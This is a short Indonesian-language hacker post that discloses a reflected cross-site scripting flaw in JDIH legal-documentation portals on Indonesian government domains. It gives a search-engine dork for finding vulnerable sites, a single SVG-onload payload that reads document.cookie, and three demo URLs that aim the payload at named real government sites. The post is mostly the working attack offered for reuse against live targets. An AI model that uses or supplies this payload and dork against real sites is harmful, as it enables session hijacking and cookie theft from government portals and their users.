Jdih Vulnreability Cross Site Scripting { XSS }

 


Cross-Site Scripting atau serangan XSS adalah eksploitasi keamanan di mana penyerang menempatkan kode client-end berbahaya ke halaman web. 

Penyerang yang menggunakan kerentanan XSS mencuri data pengguna, 

atau mengontrol sesi pengguna, menjalankan kode berbahaya, 

atau bahkan menggunakannya sebagai komponen utama penipuan phishing.

Tapi Ini Bugnya Udah Lama Jga Yah Guys Gw Share In Sekarang Aja Hehehe,Sorry Telat


[*] Dork : site:jdih.*.go.id inurl:/result?q=


[*] Exploit:


"><svg onload=prompt(document.cookie)>


[*] Demo:

=========

https://jdih.bkn.go.id/ildis/www/index.php/web/result?q="><svg onload=prompt(document.cookie)>


https://jdih.kemsos.go.id/pencarian/www/index.php/web/result?q="><svg onload=prompt(document.cookie)>


https://jdih.esdm.go.id/index.php/web/result?q="><svg onload=prompt(document.cookie)>